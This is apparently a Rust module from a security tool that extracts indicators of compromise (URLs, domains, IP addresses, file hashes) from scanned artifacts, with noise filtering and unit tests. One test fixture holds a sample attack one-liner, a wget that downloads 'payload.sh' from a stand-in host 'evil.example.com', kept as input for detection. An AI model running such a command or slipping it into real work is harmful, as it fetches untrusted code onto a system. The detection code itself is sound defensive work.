1use crate::lazy_pattern;
15use serde::{Deserialize, Serialize};
16use sha2::{Digest, Sha256};
17use std::collections::BTreeSet;
18use std::path::{Path, PathBuf};
19
// Matches `http://` or `https://` followed by 3 to 512 characters that are
// not whitespace, quotes (`"`/`'`), angle brackets, a backtick, braces,
// square brackets, parentheses or a backslash. Trailing punctuation such as
// `.` or `,` is NOT excluded by the pattern; callers trim it afterwards.
lazy_pattern!(URL_PATTERN, r#"https?://[^\s"'<>`\{\}\[\]\(\)\\]{3,512}"#);
21
// Matches a word-bounded dotted quad whose four octets are each in 0..=255.
// The `[01]?\d?\d` alternative also admits leading zeros (e.g. `010`).
lazy_pattern!(
    IPV4_PATTERN,
    r"\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\b"
);
26
// Matches two word-bounded IPv6 shapes:
//   1. a compressed form: 1-7 `hex:` groups followed by 1-7 `:hex` groups,
//      which always contains `::` with at least one group on each side;
//   2. the full form: exactly eight colon-separated groups.
// Each group is 1-4 hex digits. Forms that start or end with `::` (such as
// `::1`) are not covered, and the compressed alternative does not limit the
// total number of groups to eight.
lazy_pattern!(
    IPV6_PATTERN,
    r"\b(?:(?:[A-Fa-f0-9]{1,4}:){1,7}(?::[A-Fa-f0-9]{1,4}){1,7}|(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4})\b"
);
37
// Matches bare host names (no scheme) that end in one of a fixed list of
// suffixes. Each label is 1-63 characters of `[a-z0-9]` with hyphens allowed
// only in the interior. The pattern requires a first label, then one or more
// further `.label` parts, and only then the `.suffix`, so a match has at
// least two labels before the suffix (`a.b.com` matches, `b.com` alone does
// not).
// NOTE(review): confirm that excluding bare two-label hosts is intentional.
// NOTE(review): the character classes are lowercase-only; whether matching is
// case-insensitive depends on how `lazy_pattern!` compiles the regex — verify.
lazy_pattern!(
    HOST_MENTION_PATTERN,
    r"\b([a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?)+\.(?:com|net|org|io|dev|ai|fly\.dev|vercel\.app|co|me|xyz|app|cloud|tech|info|biz|pro|us|uk|de|fr|es|it|ru|cn|jp|hk|tw|kr|sg|in|br|mx|ca|au|nz|za|ae|tr|il|ch|nl|be|se|no|fi|dk|pl|ir|pk|sa|eg|th|vn|ph|id|my|ng))\b"
);
46
/// Indicators of compromise (IOCs) collected from one or more artifacts.
///
/// The string lists are sorted and de-duplicated when they are produced by
/// [`extract_from_text`] or [`ExtractedIocs::merge`]; the type itself does
/// not enforce that ordering.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct ExtractedIocs {
    /// `http`/`https` URLs found in the text, with trailing punctuation trimmed.
    pub urls: Vec<String>,
    /// Host names taken from URLs and from bare host mentions.
    pub domains: Vec<String>,
    /// IPv4 addresses that were not filtered out as noise.
    pub ipv4: Vec<String>,
    /// IPv6 addresses that passed the plausibility check.
    pub ipv6: Vec<String>,
    /// SHA-256 digests of the artifacts that were scanned.
    pub file_hashes: Vec<FileHash>,
}
59
/// The SHA-256 digest of a single artifact, keyed by the path it was read from.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct FileHash {
    /// Path of the artifact as supplied by the caller.
    pub path: PathBuf,
    /// Lowercase hexadecimal SHA-256 digest of the artifact's bytes.
    pub sha256: String,
}
65
66impl ExtractedIocs {
67 pub fn is_empty(&self) -> bool {
68 self.urls.is_empty()
69 && self.domains.is_empty()
70 && self.ipv4.is_empty()
71 && self.ipv6.is_empty()
72 && self.file_hashes.is_empty()
73 }
74
75 pub fn merge(&mut self, other: ExtractedIocs) {
77 fn merge_sorted(target: &mut Vec<String>, additions: Vec<String>) {
78 let mut set: BTreeSet<String> = target.drain(..).collect();
79 set.extend(additions);
80 *target = set.into_iter().collect();
81 }
82 merge_sorted(&mut self.urls, other.urls);
83 merge_sorted(&mut self.domains, other.domains);
84 merge_sorted(&mut self.ipv4, other.ipv4);
85 merge_sorted(&mut self.ipv6, other.ipv6);
86
87 let mut seen: BTreeSet<(PathBuf, String)> = self
88 .file_hashes
89 .drain(..)
90 .map(|h| (h.path, h.sha256))
91 .collect();
92 for h in other.file_hashes {
93 seen.insert((h.path, h.sha256));
94 }
95 self.file_hashes = seen
96 .into_iter()
97 .map(|(path, sha256)| FileHash { path, sha256 })
98 .collect();
99 }
100}
101
/// Host names that are never reported as domain IOCs.
///
/// `is_noise_domain` compares a lowercased host against these entries for
/// exact equality, so subdomains such as `evil.example.com` are NOT filtered.
const NOISE_DOMAINS: &[&str] = &[
    "localhost",
    "localhost.localdomain",
    "example.com",
    "example.org",
    "example.net",
    "test.com",
    "invalid",
];
114
/// String prefixes of IPv4 addresses that are dropped as noise.
///
/// `is_noise_ipv4` tests these with `starts_with`. The `172.16.0.0/12` range
/// is not listed here because it cannot be expressed as one string prefix; it
/// is handled by `is_rfc1918_172`. `0.0.0.0` is additionally checked by exact
/// equality in `is_noise_ipv4`.
const NOISE_IPV4_PREFIXES: &[&str] = &[
    "127.", "0.0.0.0", "10.", "192.168.", "169.254.", ];
127
/// Addresses that are always reported even though a noise prefix covers them.
///
/// `is_noise_ipv4` consults this list before any other rule, so
/// `169.254.169.254` survives the `169.254.` prefix filter.
const KEEP_SPECIAL_IPV4: &[&str] = &[
    "169.254.169.254", ];
133
/// Upper bound on how many distinct values of each IOC kind (URLs, domains,
/// IPv4, IPv6) `extract_from_text` collects from a single input.
pub const MAX_IOCS_PER_KIND_PER_ARTIFACT: usize = 4_096;
143
144pub fn extract_from_artifact(path: &Path, content: &[u8]) -> ExtractedIocs {
148 let mut out = if let Ok(text) = std::str::from_utf8(content) {
149 extract_from_text(text)
150 } else {
151 let lossy = String::from_utf8_lossy(content);
153 extract_from_text(&lossy)
154 };
155 out.file_hashes.push(FileHash {
156 path: path.to_path_buf(),
157 sha256: sha256_hex(content),
158 });
159 out
160}
161
162pub fn extract_from_text(text: &str) -> ExtractedIocs {
170 let mut urls: BTreeSet<String> = BTreeSet::new();
171 let mut domains: BTreeSet<String> = BTreeSet::new();
172 let mut ipv4: BTreeSet<String> = BTreeSet::new();
173 let mut ipv6: BTreeSet<String> = BTreeSet::new();
174
175 fn try_insert_bounded(set: &mut BTreeSet<String>, value: String, kind: &'static str) -> bool {
179 if set.len() >= MAX_IOCS_PER_KIND_PER_ARTIFACT {
180 tracing::warn!(
181 kind,
182 cap = MAX_IOCS_PER_KIND_PER_ARTIFACT,
183 "ioc_extraction: per-artifact IOC cap reached; truncating further matches"
184 );
185 return false;
186 }
187 set.insert(value);
188 true
189 }
190
191 for m in URL_PATTERN.find_matches(text) {
192 let raw = m.matched_text.as_str();
193 let trimmed = raw.trim_end_matches([',', '.', ';', ':', ')', ']', '}', '!', '?']);
194 if !try_insert_bounded(&mut urls, trimmed.to_string(), "url") {
195 break;
196 }
197 if let Some(host) = extract_host_from_url(trimmed) {
198 if !is_noise_domain(&host) && !is_ipv4(&host) && !is_ipv6(&host) {
199 if domains.len() < MAX_IOCS_PER_KIND_PER_ARTIFACT {
203 try_insert_bounded(&mut domains, host, "domain");
204 }
205 }
206 }
207 }
208
209 for m in HOST_MENTION_PATTERN.find_matches(text) {
210 let host = m.matched_text.to_ascii_lowercase();
211 if !is_noise_domain(&host) && !try_insert_bounded(&mut domains, host, "domain") {
212 break;
213 }
214 }
215
216 for m in IPV4_PATTERN.find_matches(text) {
217 let ip = m.matched_text.as_str();
218 if !is_noise_ipv4(ip) && !try_insert_bounded(&mut ipv4, ip.to_string(), "ipv4") {
219 break;
220 }
221 }
222
223 for m in IPV6_PATTERN.find_matches(text) {
224 let ip = m.matched_text;
225 if ip.matches(':').count() >= 2
231 && is_plausible_ipv6(&ip)
232 && !try_insert_bounded(&mut ipv6, ip, "ipv6")
233 {
234 break;
235 }
236 }
237
238 ExtractedIocs {
239 urls: urls.into_iter().collect(),
240 domains: domains.into_iter().collect(),
241 ipv4: ipv4.into_iter().collect(),
242 ipv6: ipv6.into_iter().collect(),
243 file_hashes: Vec::new(),
244 }
245}
246
/// Returns the lowercased host of `url`, or `None` if there is no scheme
/// separator (`://`) or the host is empty.
///
/// Userinfo (`user:pass@`) and the port are stripped. A bracketed IPv6
/// literal such as `[::1]:8080` yields the address without brackets.
fn extract_host_from_url(url: &str) -> Option<String> {
    let (_, after_scheme) = url.split_once("://")?;

    // Isolate the authority first. An `@` in the path, query or fragment
    // (e.g. `?email=user@example.org`) must not be mistaken for the userinfo
    // delimiter, otherwise the wrong host is reported.
    let authority_end = after_scheme
        .find(['/', '?', '#'])
        .unwrap_or(after_scheme.len());
    let authority = &after_scheme[..authority_end];

    // Within the authority, the last `@` separates userinfo from the host.
    let host_port = authority
        .rsplit_once('@')
        .map_or(authority, |(_, host)| host);

    let host = if host_port.starts_with('[') {
        // Bracketed IPv6 literal: keep what lies between `[` and `]`.
        host_port.trim_start_matches('[').split(']').next()
    } else {
        host_port.split(':').next()
    };

    host.map(str::to_ascii_lowercase).filter(|h| !h.is_empty())
}
269
270fn is_noise_domain(domain: &str) -> bool {
271 let d = domain.to_ascii_lowercase();
272 NOISE_DOMAINS.iter().any(|n| d == *n)
273}
274
275fn is_noise_ipv4(ip: &str) -> bool {
276 if KEEP_SPECIAL_IPV4.contains(&ip) {
277 return false;
278 }
279 if ip == "0.0.0.0" {
280 return true;
281 }
282 if NOISE_IPV4_PREFIXES
283 .iter()
284 .any(|prefix| ip.starts_with(prefix))
285 {
286 return true;
287 }
288 is_rfc1918_172(ip)
289}
290
/// Returns `true` when `ip` is in `172.16.0.0/12`, i.e. the first octet is
/// `172` and the second octet parses to a value in `16..=31`.
///
/// Only the first two dot-separated parts are inspected.
fn is_rfc1918_172(ip: &str) -> bool {
    let second_octet = ip
        .strip_prefix("172.")
        .and_then(|rest| rest.split('.').next())
        .and_then(|octet| octet.parse::<u8>().ok());
    matches!(second_octet, Some(16..=31))
}
307
308fn is_ipv4(s: &str) -> bool {
309 IPV4_PATTERN.is_match(s) && s.matches('.').count() == 3
310}
311
312fn is_ipv6(s: &str) -> bool {
313 s.matches(':').count() >= 2 && IPV6_PATTERN.is_match(s) && is_plausible_ipv6(s)
314}
315
/// Shape check for an IPv6 candidate.
///
/// Anything containing `::` is accepted as a compressed address. Otherwise
/// the candidate must be exactly eight colon-separated groups, each non-empty
/// and at most four characters long. Group contents are not checked for
/// being hexadecimal here.
fn is_plausible_ipv6(s: &str) -> bool {
    if s.contains("::") {
        return true;
    }

    let mut group_count = 0usize;
    for group in s.split(':') {
        if group.is_empty() || group.len() > 4 {
            return false;
        }
        group_count += 1;
    }
    group_count == 8
}
329
330fn sha256_hex(bytes: &[u8]) -> String {
331 let mut hasher = Sha256::new();
332 hasher.update(bytes);
333 format!("{:x}", hasher.finalize())
334}
335
// Unit tests for IOC extraction: caps, noise filtering, IPv6 plausibility,
// hashing, de-duplication and merging.
#[cfg(test)]
mod tests {
    use super::*;

    // Feeds more distinct URLs than the per-kind cap and checks that the URL
    // list never exceeds `MAX_IOCS_PER_KIND_PER_ARTIFACT`.
    #[test]
    fn extract_from_text_caps_url_count_per_artifact() {
        let mut text = String::new();
        let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 256;
        for n in 0..target {
            use std::fmt::Write;
            let _ = writeln!(text, "see https://example-{n}.test/ for details");
        }
        let iocs = extract_from_text(&text);
        assert!(
            iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "URL set must be capped at {}; got {}",
            MAX_IOCS_PER_KIND_PER_ARTIFACT,
            iocs.urls.len()
        );
    }

    // A shell one-liner with two URLs must yield both URLs and both hosts.
    // `evil.example.com` is kept because the noise list only matches
    // `example.com` exactly.
    #[test]
    fn extracts_urls_and_domains_from_script() {
        let text = "curl -s -X POST http://sphinx.espuny.net:5000/v1/audio ; wget https://evil.example.com/payload.sh";
        let iocs = extract_from_text(text);
        assert!(iocs
            .urls
            .iter()
            .any(|u| u.starts_with("http://sphinx.espuny.net:5000")));
        assert!(iocs
            .urls
            .iter()
            .any(|u| u.starts_with("https://evil.example.com")));
        assert!(iocs.domains.contains(&"sphinx.espuny.net".to_string()));
        assert!(iocs.domains.iter().any(|d| d == "evil.example.com"));
    }

    // Addresses under the 127., 10. and 192.168. prefixes are dropped, while
    // a public address and the keep-listed 169.254.169.254 are retained.
    #[test]
    fn filters_loopback_and_private_ips() {
        let text = "target = 127.0.0.1 fallback = 10.0.0.5 router = 192.168.1.1 public = 8.8.8.8 imds = 169.254.169.254";
        let iocs = extract_from_text(text);
        assert!(iocs.ipv4.contains(&"8.8.8.8".to_string()));
        assert!(iocs.ipv4.contains(&"169.254.169.254".to_string()));
        assert!(!iocs.ipv4.contains(&"127.0.0.1".to_string()));
        assert!(!iocs.ipv4.contains(&"10.0.0.5".to_string()));
        assert!(!iocs.ipv4.contains(&"192.168.1.1".to_string()));
    }

    // The whole 172.16.0.0/12 range (second octet 16..=31) is noise; the
    // neighbouring second octets 15, 32 and 0 are not.
    #[test]
    fn is_noise_ipv4_covers_full_rfc1918_172_12_block() {
        for ip in [
            "172.16.0.1",
            "172.17.0.1",
            "172.18.0.42",
            "172.20.5.5",
            "172.31.255.255",
        ] {
            assert!(
                is_noise_ipv4(ip),
                "172.16.0.0/12 must be filtered; failed for {ip}"
            );
        }
        for ip in ["172.15.0.1", "172.32.0.1", "172.0.0.1"] {
            assert!(
                !is_noise_ipv4(ip),
                "{ip} is outside RFC1918 172.16.0.0/12 and must NOT be filtered"
            );
        }
    }

    // Same 172.16.0.0/12 rule, exercised through `extract_from_text`.
    #[test]
    fn extract_filters_full_rfc1918_172_12_block_e2e() {
        let text =
            "docker = 172.17.0.5 internal = 172.20.1.1 public = 9.9.9.9 edge = 172.32.0.1";
        let iocs = extract_from_text(text);
        assert!(!iocs.ipv4.contains(&"172.17.0.5".to_string()));
        assert!(!iocs.ipv4.contains(&"172.20.1.1".to_string()));
        assert!(iocs.ipv4.contains(&"9.9.9.9".to_string()));
        assert!(iocs.ipv4.contains(&"172.32.0.1".to_string()));
    }

    // An eight-group hex run embedded in a longer identifier (`x...x`) must
    // not be extracted as an IPv6 address.
    #[test]
    fn ipv6_extraction_rejects_unbounded_hex_runs_in_identifiers() {
        let text = "token=xabc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8x more text";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.is_empty(),
            "IPv6 must NOT match inside identifier word characters; got {:?}",
            iocs.ipv6
        );
    }

    // A four-group token without `::` is too short to be a full address and
    // must be rejected.
    #[test]
    fn ipv6_extraction_rejects_short_hex_token_lacking_double_colon() {
        let text = "session = abc1:def2:1234:5678 next";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.is_empty(),
            "4-group hex-colon token without `::` must NOT extract as IPv6; got {:?}",
            iocs.ipv6
        );
    }

    // A compressed address is still extracted. Only the `2001:db8` address is
    // asserted; `fe80::1` is present in the input but not checked.
    #[test]
    fn ipv6_extraction_keeps_valid_addresses() {
        let text = "endpoint = 2001:db8::dead:beef:1; alt = fe80::1";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.iter().any(|i| i.contains("2001:db8")),
            "Valid IPv6 must still match; got {:?}",
            iocs.ipv6
        );
    }

    // Eight groups where the first has five characters must be rejected.
    #[test]
    fn is_plausible_ipv6_rejects_overlong_groups() {
        assert!(!is_plausible_ipv6(
            "aaaaa:bbbb:cccc:dddd:eeee:ffff:1111:2222"
        ));
    }

    // Anything containing `::` is accepted by the plausibility check.
    #[test]
    fn is_plausible_ipv6_accepts_compressed_form() {
        assert!(is_plausible_ipv6("2001:db8::1"));
        assert!(is_plausible_ipv6("fe80::1"));
    }

    // A full, uncompressed eight-group address is accepted.
    #[test]
    fn is_plausible_ipv6_accepts_full_8_group_form() {
        assert!(is_plausible_ipv6("2001:0db8:85a3:0000:0000:8a2e:0370:7334"));
    }

    // `extract_from_artifact` records exactly one hash, and it equals the
    // known SHA-256 of the bytes `hello world`.
    #[test]
    fn hashes_artifact_content() {
        let iocs = extract_from_artifact(Path::new("script.sh"), b"hello world");
        assert_eq!(iocs.file_hashes.len(), 1);
        assert_eq!(
            iocs.file_hashes[0].sha256,
            "b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
        );
    }

    // Minimal IPv6 extraction check with a single compressed address.
    #[test]
    fn ipv6_basic_extraction() {
        let text = "endpoint = 2001:db8::dead:beef:1";
        let iocs = extract_from_text(text);
        assert!(iocs.ipv6.iter().any(|i| i.contains("2001:db8")));
    }

    // Repeated values collapse to one entry and the output is sorted.
    #[test]
    fn deduplicates_and_sorts() {
        let text = "https://a.com/x https://a.com/y https://a.com/x 8.8.8.8 8.8.4.4 8.8.8.8";
        let iocs = extract_from_text(text);
        assert_eq!(
            iocs.ipv4,
            vec!["8.8.4.4".to_string(), "8.8.8.8".to_string()]
        );
        assert!(iocs.urls.len() >= 2);
    }

    // Merging two disjoint results keeps the domains and addresses of both.
    #[test]
    fn merge_combines_disjoint_lists() {
        let mut a = extract_from_text("https://foo.com/x 1.1.1.1");
        let b = extract_from_text("https://bar.io/y 8.8.8.8");
        a.merge(b);
        assert!(a.domains.contains(&"foo.com".to_string()));
        assert!(a.domains.contains(&"bar.io".to_string()));
        assert!(a.ipv4.contains(&"1.1.1.1".to_string()));
        assert!(a.ipv4.contains(&"8.8.8.8".to_string()));
    }

    // Dotted identifiers that do not end in a listed suffix must not be
    // reported as domains.
    #[test]
    fn does_not_flag_programming_identifiers_as_domains() {
        let text = "object.method.name = func.call() # not a host";
        let iocs = extract_from_text(text);
        assert!(
            iocs.domains.is_empty(),
            "got false-positive: {:?}",
            iocs.domains
        );
    }

    // Feeds more distinct hosts than the cap. The assertions only verify that
    // both the domain and URL lists stay within the cap; the number of
    // warnings logged is not inspected here.
    #[test]
    fn domain_cap_does_not_spam_repeated_warns() {
        let mut text = String::new();
        let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 100;
        for n in 0..target {
            use std::fmt::Write;
            let _ = writeln!(text, "see https://unique-{n}.example.com/");
        }
        let iocs = extract_from_text(&text);
        assert!(
            iocs.domains.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "domain set must be capped at {}; got {}",
            MAX_IOCS_PER_KIND_PER_ARTIFACT,
            iocs.domains.len()
        );
        assert!(
            iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "URL set must also be capped; got {}",
            iocs.urls.len()
        );
    }
}